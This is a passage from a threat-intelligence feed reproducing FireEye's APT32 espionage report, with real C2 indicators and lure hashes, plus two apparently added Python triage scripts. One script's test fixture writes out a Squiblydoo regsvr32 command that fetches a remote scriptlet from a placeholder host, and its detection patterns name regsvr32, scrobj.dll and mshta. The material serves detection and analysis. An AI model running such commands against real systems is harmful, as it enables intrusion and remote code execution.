and current code page\n * File system interaction including directory creation, file deletion, and reading and writing files\n * Load additional modules and execute code\n * Terminate processes\n * Anti-disassembly\n\n**KOMPROGO**\n\n * Fully featured backdoor capable of process, file, and registry management\n * Creating a reverse shell\n * File transfers\n * Running WMI queries\n * Retrieving information about the infected system\n\n**SOUNDBITE**\n\n * C2 communications via DNS\n * Process creation\n * File upload\n * Shell command execution\n * File and directory enumeration/manipulation\n * Window enumeration\n * Registry manipulation\n * System information gathering\n\n**PHOREAL**\n\n * C2 communications via ICMP\n * Reverse shell creation\n * Filesystem manipulation\n * Registry manipulation\n * Process creation\n * File upload\n\n**BEACON (Cobalt Strike)**\n\n * Publicly available payload that can inject and execute arbitrary code into processes\n * Impersonating the security context of users\n * Importing Kerberos tickets\n * Uploading and downloading files\n * Executing shell commands\n * Configured with malleable C2 profiles to blend in with normal network traffic\n * Co-deployment and interoperability with the Metasploit framework\n * SMB named pipe in-memory backdoor payload that enables peer-to-peer C2 and pivoting over SMB\n\nTable 3: APT32 Malware and Capabilities\n\nTwo of the four custom backdoors avoid TCP entirely (SOUNDBITE uses DNS and PHOREAL uses ICMP for C2), so network monitoring limited to web proxy or TLS logs will not see them.\n\nAPT32 operators appear to be well-resourced and supported, as they use a large set of domains and IP addresses as command and control infrastructure. The [FireEye iSIGHT Intelligence MySIGHT Portal](<https://www.fireeye.com/products/isight-intelligence.html>) contains additional information on these backdoor families based on Mandiant investigations of APT32 intrusions.\n\nFigure 6 provides a summary of APT32 tools and techniques mapped to each stage of the attack lifecycle.\n\nFigure 6: APT32 Attack Lifecycle\n\n#### Outlook and Implications\n\nBased on incident response investigations, product detections, and intelligence observations along with additional publications on the same operators, FireEye assesses that APT32 is a cyber espionage group aligned with Vietnamese government interests. The targeting of private sector interests by APT32 is notable and FireEye believes the actor poses significant risk to companies doing business in, or preparing to invest in, the country. 
While the motivation for each APT32 private sector compromise varied \u2013 and in some cases was unknown \u2013 the unauthorized access could serve as a platform for law enforcement, intellectual property theft, or anticorruption measures that could ultimately erode the competitive advantage of targeted organizations. Furthermore, APT32 continues to threaten political activism and free speech in Southeast Asia and the public sector worldwide. Governments, journalists, and members of the Vietnam diaspora may continue to be targeted.\n\nWhile actors from China, Iran, Russia, and North Korea remain the most active cyber espionage threats tracked and responded to by FireEye, APT32 reflects a growing host of new countries that have adopted this dynamic capability. APT32 demonstrates how accessible and impactful offensive capabilities can be with the proper investment and the flexibility to embrace newly available tools and techniques. As more countries utilize inexpensive and efficient cyber operations, there is a need for public awareness of these threats and renewed dialogue around emerging nation-state intrusions that go beyond public sector and intelligence targets.\n\n#### APT32 Detection\n\nFigure 7 contains a Yara rule that can be used to identify malicious macros associated with APT32\u2019s phishing lures:\n\nFigure 7: Yara Rule for APT32 Malicious Macros\n\nTable 4 contains a sampling of the infrastructure that FireEye has associated with APT32 C2.\n\n| **C2 Infrastructure** | | |\n|---|---|---|\n| 103.53.197.202 | 104.237.218.70 | 104.237.218.72 |\n| 185.157.79.3 | 193.169.245.78 | 193.169.245.137 |\n| 23.227.196.210 | 24.datatimes.org | 80.255.3.87 |\n| blog.docksugs.org | blog.panggin.org | contay.deaftone.com |\n| check.paidprefund.org | datatimes.org | docksugs.org |\n| economy.bloghop.org | emp.gapte.name | facebook-cdn.net |\n| gap-facebook.com | gl-appspot.org | help.checkonl.org |\n| high.expbas.net | high.vphelp.net | icon.torrentart.com |\n| images.chinabytes.info | imaps.qki6.com | img.fanspeed.net |\n| job.supperpow.com | lighpress.info | menmin.strezf.com |\n| mobile.pagmobiles.info | news.lighpress.info | notificeva.com |\n| nsquery.net | pagmobiles.info | paidprefund.org |\n| push.relasign.org | relasign.org | share.codehao.net |\n| seri.volveri.net | ssl.zin0.com | static.jg7.org |\n| syn.timeizu.net | teriava.com | timeizu.net |\n| tonholding.com | tulationeva.com | untitled.po9z.com |\n| update-flashs.com | vieweva.com | volveri.net |\n| vphelp.net | yii.yiihao126.net | zone.apize.net |\n\nTable 4: Sampling of APT32 C2 Infrastructure\n", "modified": "2017-05-14T18:00:00", "published": "2017-05-14T18:00:00", "id": "FIREEYE:8B4453AF3FA94076D63CCBDB94AFC782", "href": "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html", "type": "fireeye", "title": "Cyber Espionage is Alive and Well: APT32 and the Threat to Global Corporations", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:18:23", "bulletinFamily": "info", "cvelist": ["CVE-2016-7255"], "description": "Cyber espionage actors, now designated by FireEye as APT32 (OceanLotus Group), are carrying out intrusions into private sector companies across multiple industries and have also targeted foreign governments, dissidents, and journalists. 
FireEye assesses that APT32 leverages a unique suite of fully-featured malware, in conjunction with commercially-available tools, to conduct targeted operations that are aligned with Vietnamese state interests.\n\n#### APT32 and FireEye\u2019s Community Response\n\nIn the course of investigations into intrusions at several corporations with business interests in Vietnam, FireEye\u2019s Mandiant incident response consultants uncovered activity and attacker-controlled infrastructure indicative of a significant intrusion campaign. In March 2017, in response to active targeting of FireEye clients, the team launched a [Community Protection Event (CPE)](<https://www2.fireeye.com/WEB-Community-Protection-Security-Numbers.html>) \u2013 a coordinated effort between Mandiant incident responders, FireEye as a Service (FaaS), FireEye iSight Intelligence, and FireEye product engineering \u2013 to protect all clients from APT32 activity.\n\nIn the following weeks, FireEye released threat intelligence products and updated malware profiles to customers while developing new detection techniques for APT32\u2019s tools and phishing lures. This focused intelligence and detection effort led to new external victim identifications as well as providing sufficient technical evidence to link twelve prior intrusions, consolidating four previously unrelated clusters of threat actor activity into FireEye\u2019s newest named advanced persistent threat group: APT32.\n\n#### APT32 Targeting of Private Sector Company Operations in Southeast Asia\n\nSince at least 2014, FireEye has observed APT32 targeting foreign corporations with a vested interest in Vietnam\u2019s manufacturing, consumer products, and hospitality sectors. 
Furthermore, there are indications that APT32 actors are targeting peripheral network security and technology infrastructure corporations.\n\nHere is an overview of intrusions investigated by FireEye that are attributed to APT32:\n\n * In 2014, a European corporation was compromised prior to constructing a manufacturing facility in Vietnam.\n * In 2016, Vietnamese and foreign-owned corporations working in network security, technology infrastructure, banking, and media industries were targeted.\n * In mid-2016, malware that FireEye believes to be unique to APT32 was detected on the networks of a global hospitality industry developer with plans to expand operations into Vietnam.\n * From 2016 through 2017, two subsidiaries of U.S. and Philippine consumer products corporations, located inside Vietnam, were the target of APT32 intrusion operations.\n\nTable 1 shows a breakdown of APT32 activity, including the malware families used in each.\n\n| **Year** | **Country** | **Industry** | **Malware** |\n|---|---|---|---|\n| 2014 | Vietnam | Network Security | WINDSHIELD |\n| 2014 | Germany | Manufacturing | WINDSHIELD |\n| 2015 | Vietnam | Media | WINDSHIELD |\n| 2016 | Philippines | Consumer Products | KOMPROGO, WINDSHIELD, SOUNDBITE, BEACON |\n| 2016 | Vietnam | Banking | WINDSHIELD |\n| 2016 | Philippines | Technology Infrastructure | WINDSHIELD |\n| 2016 | China | Hospitality | WINDSHIELD |\n| 2016 | Vietnam | Media | WINDSHIELD |\n| 2016 | United States | Consumer Products | WINDSHIELD, PHOREAL, BEACON, SOUNDBITE |\n\nTable 1: APT32 Private Sector Targeting Identified by FireEye\n\n#### APT32 Interest in Political Influence and Foreign Governments\n\nIn addition to focused targeting of the private sector with ties to Vietnam, APT32 has also targeted foreign 
governments, as well as Vietnamese dissidents and journalists since at least 2013. Here is an overview of this activity:\n\n * A [public blog published by the _Electronic Frontier Foundation_](<https://www.eff.org/deeplinks/2014/01/vietnamese-malware-gets-personal>) indicated that journalists, activists, dissidents, and bloggers were targeted in 2013 by malware and tactics consistent with APT32 operations.\n * In 2014, APT32 leveraged a spear-phishing attachment titled \u201cPlans to crackdown on protesters at the Embassy of Vietnam.exe,\" which targeted dissident activity among the Vietnamese diaspora in Southeast Asia. Also in 2014, APT32 carried out an intrusion against a Western country\u2019s national legislature.\n * In 2015, SkyEye Labs, the security research division of the Chinese firm Qihoo 360, [released a report](<http://blogs.360.cn/blog/oceanlotus-apt>) detailing threat actors that were targeting Chinese public and private entities including government agencies, research institutes, maritime agencies, sea construction, and shipping enterprises. The information included in the report indicated that the perpetrators used the same malware, overlapping infrastructure, and similar targets as APT32.\n * In 2015 and 2016, two Vietnamese media outlets were targeted with malware that FireEye assesses to be unique to APT32.\n * In 2017, social engineering content in lures used by the actor provided evidence that they were likely used to target members of the Vietnam diaspora in Australia as well as government employees in the Philippines.\n\n#### APT32 Tactics\n\nIn their current campaign, APT32 has leveraged ActiveMime files that employ social engineering methods to entice the victim into enabling macros. Upon execution, the initialized file downloads multiple malicious payloads from remote servers. 
APT32 actors continue to deliver the malicious attachments via spear-phishing emails.\n\nAPT32 actors designed multilingual lure documents which were tailored to specific victims. Although the files had \u201c.doc\u201d file extensions, the recovered phishing lures were ActiveMime \u201c.mht\u201d web page archives that contained text and images. These files were likely created by exporting Word documents into single file web pages; Word identifies the format from the file content rather than the extension, so the \u201c.doc\u201d name did not stop them from opening as web archives.\n\nTable 2 contains a sample of recovered APT32 multilingual lure files.\n\n| **ActiveMime Lure File** | **MD5** |\n|---|---|\n| 2017\u5e74\u5458\u5de5\u5de5\u8d44\u6027\u6d25\u8d34\u989d\u7edf\u8ba1\u62a5\u544a.doc (2017 Statistical Report on Staff Salary and Allowances) | 5458a2e4d784abb1a1127263bd5006b5 |\n| Thong tin.doc (Information) | ce50e544430e7265a45fab5a1f31e529 |\n| Phan Vu Tutn CV.doc | 4f761095ca51bfbbf4496a4964e41d4f |\n| Ke hoach cuu tro nam 2017.doc (2017 Relief Plan) | e9abe54162ba4572c770ab043f576784 |\n| Instructions to GSIS.doc | fba089444c769700e47c6b44c362f96b |\n| Hoi thao truyen thong doc lap.doc (Independent Media Workshop) | f6ee4b72d6d42d0c7be9172be2b817c1 |\n| Gi\u1ea5y y\u00eau c\u1ea7u b\u1ed3i th\u01b0\u1eddng m\u1edbi 2016 - h\u1eb1ng.doc (New 2016 Claim Form) | aa1f85de3e4d33f31b4f78968b29f175 |\n| Hoa don chi tiet tien no.doc (Itemized Debt Invoice) | 5180a8d9325a417f2d8066f9226a5154 |\n| Thu moi tham du Hoi luan.doc (Invitation to Attend a Forum) | f6ee4b72d6d42d0c7be9172be2b817c1 |\n| Danh sach nhan vien vi pham ky luat.doc (List of Employee Disciplinary Violations) | 6baafffa7bf960dec821b627f9653e44 |\n| No\u0323\u0302i-dung-qua\u0309ng-ca\u0301o.doc (Advertising Content) | 471a2e7341f2614b715dc89e803ffcac |\n| H\u0110 DVPM-VTC 31.03.17.doc | f1af6bb36cdf3cff768faee7919f0733 |\n\nTable 2: Sampling of APT32 Lure Files\n\nThe Base64-encoded ActiveMime data also contained an OLE file with malicious macros. 
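The lure format described above has three layers that can be peeled apart without opening the document in Word: an MHTML single-file web page carrying a ".doc" name, an ActiveMime (editdata.mso) part that is a short header followed by a zlib-compressed OLE compound file, and the VBA project inside that OLE file. The HTML part can also carry the external image references used for tracking, which the section below describes. The Python script that follows is an added example and is not FireEye's code or the Yara rule of Figure 7. It constructs a toy lure in that shape (the tracker URL, MIME boundary and OLE bytes are placeholders, not data from any file in Table 2) and reports external image URLs, the number of ActiveMime parts, and whether one of them inflates to an OLE container that names a VBA project. Public analyses of ActiveMime report the zlib stream at a fixed header offset; rather than assume it, the code tries each candidate zlib header until one inflates to an OLE signature.

```python
import base64
import email
import re
import zlib

OLE_MAGIC = b'\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1'  # OLE2 compound file signature
# <img src="http://..."> references that Word fetches when the archive is rendered
IMG_SRC = re.compile(rb'<img\b[^>]*?\bsrc\s*=\s*["\']?(https?://[^"\'\s>]+)', re.I)


def extract_activemime(mso):
    """Inflate the OLE container from an ActiveMime (.mso) blob.

    ActiveMime is a short header followed by a zlib stream. Instead of trusting a
    fixed header length, try every plausible zlib header position and accept the
    first one that inflates to a compound file signature.
    """
    if not mso.startswith(b'ActiveMime'):
        return None
    for m in re.finditer(rb'\x78[\x01\x5e\x9c\xda]', mso):
        try:
            ole = zlib.decompress(mso[m.start():])
        except zlib.error:
            continue
        if ole.startswith(OLE_MAGIC):
            return ole
    return None


def triage_lure(mht_bytes):
    """Report tracking images and macro containers found in an MHTML lure."""
    report = {'external_images': [], 'activemime_parts': 0, 'vba_container': False}
    for part in email.message_from_bytes(mht_bytes).walk():
        if part.is_multipart():
            continue
        body = part.get_payload(decode=True) or b''
        ctype = part.get_content_type()
        if ctype == 'text/html':
            report['external_images'] += [u.decode('ascii', 'replace') for u in IMG_SRC.findall(body)]
        elif ctype == 'application/x-mso' or body.startswith(b'ActiveMime'):
            report['activemime_parts'] += 1
            ole = extract_activemime(body)
            # OLE directory entries store stream names as UTF-16LE, so a VBA
            # project shows up as 'V\x00B\x00A\x00' even without a full parser.
            if ole is not None and 'VBA'.encode('utf-16-le') in ole:
                report['vba_container'] = True
    return report


def build_sample_lure():
    """Constructed toy lure in the shape of a Word single-file web page; the tracker
    host, boundary and OLE bytes are placeholders, not data from a real sample."""
    fake_ole = OLE_MAGIC + b'\x00' * 64 + '_VBA_PROJECT'.encode('utf-16-le') + b'\x00' * 64
    mso = b'ActiveMime' + b'\x00' * 40 + zlib.compress(fake_ole)
    html = (b'<html><body><p>Enable Content to display this document.</p>'
            b'<img src="http://tracker.example.invalid/pixel.gif">'
            b'<img src="cid:image001.png"></body></html>')
    b = b'----=_NextPart_TOY'
    return (b'MIME-Version: 1.0\r\n'
            b'Content-Type: multipart/related; boundary="' + b + b'"\r\n\r\n'
            b'--' + b + b'\r\nContent-Type: text/html; charset="utf-8"\r\n'
            b'Content-Transfer-Encoding: 8bit\r\n\r\n' + html + b'\r\n'
            b'--' + b + b'\r\nContent-Type: application/x-mso\r\n'
            b'Content-Location: file:///C:/lure_files/editdata.mso\r\n'
            b'Content-Transfer-Encoding: base64\r\n\r\n' + base64.encodebytes(mso) +
            b'\r\n--' + b + b'--\r\n')


if __name__ == '__main__':
    print(triage_lure(build_sample_lure()))
```

For a real sample, feed the raw file bytes to triage_lure and hand any returned OLE container to olefile or olevba for the actual VBA source; the UTF-16LE "VBA" check here only tells you a VBA project exists, not what it does.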
When opened, many lure files displayed fake error messages in an attempt to trick users into launching the malicious macros. Figure 1 shows a fake Gmail-theme paired with a hexadecimal error code that encourages the recipient to enable content to resolve the error. Figure 2 displays another APT32 lure that used a convincing image of a fake Windows error message instructing the recipient to enable content to properly display document font characters.\n\nFigure 1: Example APT32 Phishing Lure \u2013 Fake Gmail Error Message\n\nFigure 2: Example APT32 Phishing Lure \u2013 Fake Text Encoding Error Message\n\nAPT32 operators implemented several novel techniques to track the efficacy of their phishing, monitor the distribution of their malicious documents, and establish persistence mechanisms to dynamically update backdoors injected into memory.\n\nIn order to track who opened the phishing emails, viewed the links, and downloaded the attachments in real-time, APT32 used cloud-based email analytics software designed for sales organizations. In some instances, APT32 abandoned direct email attachments altogether and relied exclusively on this tracking technique with links to their ActiveMime lures hosted externally on legitimate cloud storage services.\n\nTo enhance visibility into the further distribution of their phishing lures, APT32 utilized the native web page functionality of their ActiveMime documents to link to external images hosted on APT32 monitored infrastructure.\n\nFigure 3 contains an example phishing lure with HTML image tags used for additional tracking by APT32.\n\nFigure 3: Phishing Lure Containing HTML Image Tags for Additional Tracking\n\nWhen a document with this feature is opened, Microsoft Word will attempt to download the external image, even if macros were disabled. In all phishing lures analyzed, the external images did not exist. 
Mandiant consultants suspect that APT32 was monitoring web logs to track the public IP address used to request remote images. When combined with email tracking software, APT32 was able to closely track phishing delivery, success rate, and conduct further analysis about victim organizations while monitoring the interest of security firms.\n\nOnce macros were enabled on the target system, the malicious macros created two named scheduled tasks as persistence mechanisms for two backdoors on the infected system. The first named scheduled task launched an application whitelisting script protection bypass to execute a COM scriptlet that dynamically downloaded the first backdoor from APT32\u2019s infrastructure and injected it into memory. The second named scheduled task, loaded as an XML file to falsify task attributes, ran a JavaScript code block that downloaded and launched a secondary backdoor, delivered as a multi-stage PowerShell script. In most lures, one scheduled task persisted an APT32-specific backdoor and the other scheduled task initialized a commercially-available backdoor as backup.\n\nTo illustrate the complexity of these lures, Figure 4 shows the creation of persistence mechanisms for recovered APT32 lure \u201c2017\u5e74\u5458\u5de5\u5de5\u8d44\u6027\u6d25\u8d34\u989d\u7edf\u8ba1\u62a5\u544a.doc\u201d.\n\nFigure 4: APT32 ActiveMime Lures Create Two Named Scheduled Tasks\n\nIn this example, a scheduled task named \u201cWindows Scheduled Maintenance\u201d was created to run Casey Smith\u2019s [\u201cSquiblydoo\u201d App Whitelisting bypass](<http://subt0x10.blogspot.com/2016/04/bypass-application-whitelisting-script.html>) every 30 minutes. While all payloads can be dynamically updated, at the time of delivery, this task launched a COM scriptlet (\u201c.sct\u201d file extension) that downloaded and executed Meterpreter hosted on images.chinabytes[.]info. 
Meterpreter then loaded Cobalt Strike BEACON, configured to communicate with 80.255.3[.]87 using the [Safebrowsing malleable C2 profile](<https://github.com/rsmudge/Malleable-C2-Profiles/blob/master/normal/safebrowsing.profile>) to further blend in with network traffic. A second scheduled task named \u201cScheduled Defrags\u201d was registered from raw task XML whose creation timestamp was backdated to June 2, 2016; the registration date is simply a field in that XML, so it says nothing about when the task was actually created. This second task ran \u201cmshta.exe\u201d every 50 minutes, which launched an APT32-specific backdoor delivered as shellcode in a PowerShell script, configured to communicate with the domains blog.panggin[.]org, share.codehao[.]net, and yii.yiihao126[.]net.\n\nFigure 5 illustrates the chain of events for a single successful APT32 phishing lure that dynamically injects two multi-stage malware frameworks into memory.\n\nFigure 5: APT32 Phishing Chain of Events\n\nAPT32 operations did not stop after they established a foothold in victim environments. Several Mandiant investigations revealed that, after gaining access, APT32 regularly cleared select event log entries and heavily obfuscated their PowerShell-based tools and shellcode loaders with Daniel Bohannon\u2019s [Invoke-Obfuscation](<https://github.com/danielbohannon/Invoke-Obfuscation>) framework.\n\nAPT32 regularly used stealthy techniques to blend in with legitimate user activity:\n\n * During one investigation, APT32 was observed using a privilege escalation exploit for CVE-2016-7255 (a win32k.sys kernel-mode elevation-of-privilege flaw patched by Microsoft in November 2016) masquerading as a Windows hotfix.\n * In another investigation, APT32 compromised the victim\u2019s McAfee ePO infrastructure to distribute their malware as a software deployment task, in which all systems pulled the payload from the ePO server using the proprietary SPIPE protocol.\n * APT32 also used hidden or non-printing characters to help visually camouflage their malware on a system. 
For example, APT32 installed one backdoor as a persistent service whose otherwise legitimate service name had a Unicode no-break space (U+00A0) appended to it. Another backdoor used an otherwise legitimate DLL filename padded with a non-printing control character, so the name looked identical to the legitimate one in most listings.\n\n#### APT32 Malware and Infrastructure\n\nAPT32 appears to have a well-resourced development capability and uses a custom suite of backdoors spanning multiple protocols. APT32 operations are characterized by the deployment of signature malware payloads including WINDSHIELD, KOMPROGO, SOUNDBITE, and PHOREAL. APT32 often deploys these backdoors along with the commercially available Cobalt Strike BEACON backdoor. APT32 may also possess [backdoor development capabilities for macOS](<https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update>).\n\nThe capabilities of this suite of malware are shown in Table 3.\n\n**WINDSHIELD**\n\n * Command and control (C2) communications via TCP raw sockets\n * Four configured C2s and six configured ports \u2013 a randomly chosen C2/port pair is used for each connection\n * Registry manipulation\n * Get the current module's file name\n * Gather system information including registry values, user name, computer name, and current code page\n * File system interaction including directory creation, file deletion, and reading and writing files\n * Load additional modules and execute code\n * Terminate processes\n * Anti-disassembly\n\n**KOMPROGO**\n\n * Fully featured backdoor capable of process, file, and registry management\n * Creating a reverse shell\n * File transfers\n * Running WMI queries\n * Retrieving information about the infected system\n\n**SOUNDBITE**\n\n * C2 communications via DNS\n * Process creation\n * File upload\n * Shell command execution\n * File and directory enumeration/manipulation\n * Window enumeration\n * Registry manipulation\n * System information gathering\n\n**PHOREAL**\n\n * C2 communications via ICMP\n * Reverse shell creation\n * Filesystem manipulation\n * Registry manipulation\n * Process creation\n * File upload\n\n**BEACON (Cobalt Strike)**\n\n * Publicly available payload that can inject and execute arbitrary code into processes\n * Impersonating the security context of users\n * Importing Kerberos tickets\n * Uploading and downloading files\n * Executing shell commands\n * Configured with malleable C2 profiles to blend in with normal network traffic\n * Co-deployment and interoperability with the Metasploit framework\n * SMB named pipe in-memory backdoor payload that enables peer-to-peer C2 and pivoting over SMB\n\nTable 3: APT32 Malware and Capabilities\n\nTwo of the four custom backdoors avoid TCP entirely (SOUNDBITE uses DNS and PHOREAL uses ICMP for C2), so network monitoring limited to web proxy or TLS logs will not see them.\n\nAPT32 operators appear to be well-resourced and supported, as they use a large set of domains and IP addresses as command and control infrastructure. The [FireEye iSIGHT Intelligence MySIGHT Portal](<https://www.fireeye.com/products/isight-intelligence.html>) contains additional information on these backdoor families based on Mandiant investigations of APT32 intrusions.\n\nFigure 6 provides a summary of APT32 tools and techniques mapped to each stage of the attack lifecycle.\n\nFigure 6: APT32 Attack Lifecycle\n\n#### Outlook and Implications\n\nBased on incident response investigations, product detections, and intelligence observations along with additional publications on the same operators, FireEye assesses that APT32 is a cyber espionage group aligned with Vietnamese government interests. The targeting of private sector interests by APT32 is notable and FireEye believes the actor poses significant risk to companies doing business in, or preparing to invest in, the country. 
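The two scheduled tasks and the non-printing-character names described under APT32 Tactics above leave host artifacts that can be triaged offline: task definitions exported with schtasks /Query /TN <name> /XML or read from C:\Windows\System32\Tasks, and service and file name listings. The following Python script is an added example, not FireEye's tooling. It flags Exec actions that launch regsvr32 with scrobj.dll or a remote .sct (Squiblydoo) or mshta, compares the attacker-controlled RegistrationInfo/Date in the XML against an independently observed creation time that the caller supplies (the Security log event 4698 or the NTFS timestamps of the task file), flags sub-hourly repetition, and lists every service or file name character that renders as nothing or as plain whitespace. The task definitions and timestamps are constructed to mirror the two tasks described above; the .sct URL, the HTA path and the 4698 time are placeholders, not the real indicators.

```python
import re
import unicodedata
import xml.etree.ElementTree as ET
from datetime import datetime, timedelta

TASK_NS = {'t': 'http://schemas.microsoft.com/windows/2004/02/mit/task'}

# Launchers APT32 persisted through tasks; each pattern runs over "<Command> <Arguments>".
LOLBIN_PATTERNS = (
    ('squiblydoo', re.compile(r'regsvr32(?:\.exe)?\b.*\bscrobj\.dll', re.I)),
    ('regsvr32-remote-sct', re.compile(r'regsvr32(?:\.exe)?\b.*/i:https?://', re.I)),
    ('mshta', re.compile(r'\bmshta(?:\.exe)?\b', re.I)),
)


def duration_minutes(iso):
    """Parse the ISO 8601 durations Task Scheduler uses in <Interval> (PT30M, P1DT2H, ...)."""
    m = re.fullmatch(r'P(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?)?', (iso or '').strip())
    if not m:
        return None
    d, h, mi, s = (int(x) if x else 0 for x in m.groups())
    return d * 1440 + h * 60 + mi + s / 60


def triage_task(xml_text, observed_created, max_skew=timedelta(days=1), frequent_minutes=60):
    """Return finding tags for one task definition.

    observed_created is when the task was really registered, taken from a source the
    attacker does not write (Security event 4698, NTFS timestamps of the task file);
    the XML's own RegistrationInfo/Date is whatever the task author put there.
    """
    if isinstance(observed_created, str):
        observed_created = datetime.fromisoformat(observed_created)
    root = ET.fromstring(xml_text)
    findings = []
    for ex in root.findall('t:Actions/t:Exec', TASK_NS):
        cmdline = ' '.join(filter(None, (ex.findtext('t:Command', '', TASK_NS),
                                         ex.findtext('t:Arguments', '', TASK_NS))))
        findings += [tag for tag, rx in LOLBIN_PATTERNS if rx.search(cmdline)]
    declared = root.findtext('t:RegistrationInfo/t:Date', None, TASK_NS)
    if declared and observed_created - datetime.fromisoformat(declared[:19]) > max_skew:
        findings.append('backdated-registration')
    for iv in root.iterfind('.//t:Repetition/t:Interval', TASK_NS):
        mins = duration_minutes(iv.text)
        if mins is not None and mins <= frequent_minutes:
            findings.append('frequent-repetition')
    return findings


def suspicious_name_chars(name):
    """(index, Unicode name) of every character in a service or file name that renders as
    nothing or as ordinary whitespace: controls, format characters, and any space
    separator other than U+0020."""
    hits = []
    for i, ch in enumerate(name):
        cat = unicodedata.category(ch)
        if cat in ('Cc', 'Cf', 'Zl', 'Zp') or (cat == 'Zs' and ch != ' '):
            hits.append((i, unicodedata.name(ch, 'U+%04X' % ord(ch))))
    return hits


# Constructed task definitions modelled on the two tasks described above; the .sct URL
# and HTA path are placeholders rather than the real indicators.
TASK_SQUIBLYDOO = '''<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><Date>2017-03-20T09:12:44</Date></RegistrationInfo>
  <Triggers><TimeTrigger><Repetition><Interval>PT30M</Interval></Repetition></TimeTrigger></Triggers>
  <Actions><Exec><Command>regsvr32.exe</Command>
    <Arguments>/s /n /u /i:http://images.example.invalid/update.sct scrobj.dll</Arguments></Exec></Actions>
</Task>'''
TASK_DEFRAGS = r'''<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><Date>2016-06-02T10:00:00</Date></RegistrationInfo>
  <Triggers><TimeTrigger><Repetition><Interval>PT50M</Interval></Repetition></TimeTrigger></Triggers>
  <Actions><Exec><Command>mshta.exe</Command><Arguments>C:\ProgramData\defrag.hta</Arguments></Exec></Actions>
</Task>'''
TASK_BENIGN = '''<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><Date>2017-03-20T09:00:00</Date></RegistrationInfo>
  <Triggers><CalendarTrigger><ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay></CalendarTrigger></Triggers>
  <Actions><Exec><Command>defrag.exe</Command><Arguments>C: /O</Arguments></Exec></Actions>
</Task>'''

if __name__ == '__main__':
    logged = '2017-03-20T09:13:01'  # constructed: time of the Security 4698 events for these tasks
    for label, xml in (('Windows Scheduled Maintenance', TASK_SQUIBLYDOO),
                       ('Scheduled Defrags', TASK_DEFRAGS), ('Daily defrag', TASK_BENIGN)):
        print(label, triage_task(xml, logged))
    for name in ('Windows Update\u00a0', 'msvcrt.dll\x07', 'Windows Update'):
        print(repr(name), suspicious_name_chars(name))
```

The backdating check is only as good as the independent timestamp you give it; if the attacker has also cleared the Security log, fall back to the $STANDARD_INFORMATION and $FILE_NAME timestamps of the task file, and treat the two disagreeing as a finding in itself.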
While the motivation for each APT32 private sector compromise varied \u2013 and in some cases was unknown \u2013 the unauthorized access could serve as a platform for law enforcement, intellectual property theft, or anticorruption measures that could ultimately erode the competitive advantage of targeted organizations. Furthermore, APT32 continues to threaten political activism and free speech in Southeast Asia and the public sector worldwide. Governments, journalists, and members of the Vietnam diaspora may continue to be targeted.\n\nWhile actors from China, Iran, Russia, and North Korea remain the most active cyber espionage threats tracked and responded to by FireEye, APT32 reflects a growing host of new countries that have adopted this dynamic capability. APT32 demonstrates how accessible and impactful offensive capabilities can be with the proper investment and the flexibility to embrace newly available tools and techniques. As more countries utilize inexpensive and efficient cyber operations, there is a need for public awareness of these threats and renewed dialogue around emerging nation-state intrusions that go beyond public sector and intelligence targets.\n\n#### APT32 Detection\n\nFigure 7 contains a Yara rule that can be used to identify malicious macros associated with APT32\u2019s phishing lures:\n\nFigure 7: Yara Rule for APT32 Malicious Macros\n\nTable 4 contains a sampling of the infrastructure that FireEye has associated with APT32 C2.\n\n| **C2 Infrastructure** | | |\n|---|---|---|\n| 103.53.197.202 | 104.237.218.70 | 104.237.218.72 |\n| 185.157.79.3 | 193.169.245.78 | 193.169.245.137 |\n| 23.227.196.210 | 24.datatimes.org | 80.255.3.87 |\n| blog.docksugs.org | blog.panggin.org | contay.deaftone.com |\n| check.paidprefund.org | datatimes.org | docksugs.org |\n| economy.bloghop.org | emp.gapte.name | facebook-cdn.net |\n| gap-facebook.com | gl-appspot.org | help.checkonl.org |\n| high.expbas.net | high.vphelp.net | icon.torrentart.com |\n| images.chinabytes.info | imaps.qki6.com | img.fanspeed.net |\n| job.supperpow.com | lighpress.info | menmin.strezf.com |\n| mobile.pagmobiles.info | news.lighpress.info | notificeva.com |\n| nsquery.net | pagmobiles.info | paidprefund.org |\n| push.relasign.org | relasign.org | share.codehao.net |\n| seri.volveri.net | ssl.zin0.com | static.jg7.org |\n| syn.timeizu.net | teriava.com | timeizu.net |\n| tonholding.com | tulationeva.com | untitled.po9z.com |\n| update-flashs.com | vieweva.com | volveri.net |\n| vphelp.net | yii.yiihao126.net | zone.apize.net |\n\nTable 4: Sampling of APT32 C2 Infrastructure\n", "modified": "2017-05-14T18:00:00", "published": "2017-05-14T18:00:00", "id": "FIREEYE:3E714A2B7BA85E8C1459F38BE1BC289A", "href": "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html", "type": "fireeye", "title": "Cyber Espionage is Alive and Well: APT32 and the Threat to Global Corporations", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-06-06T23:14:39", "bulletinFamily": "info", "cvelist": ["CVE-2017-0001", "CVE-2017-0263", "CVE-2017-0199", "CVE-2016-7255", "CVE-2017-0262", "CVE-2017-0261"], "description": "In 2015, FireEye published details about two attacks exploiting vulnerabilities in Encapsulated PostScript (EPS) of Microsoft Office. 
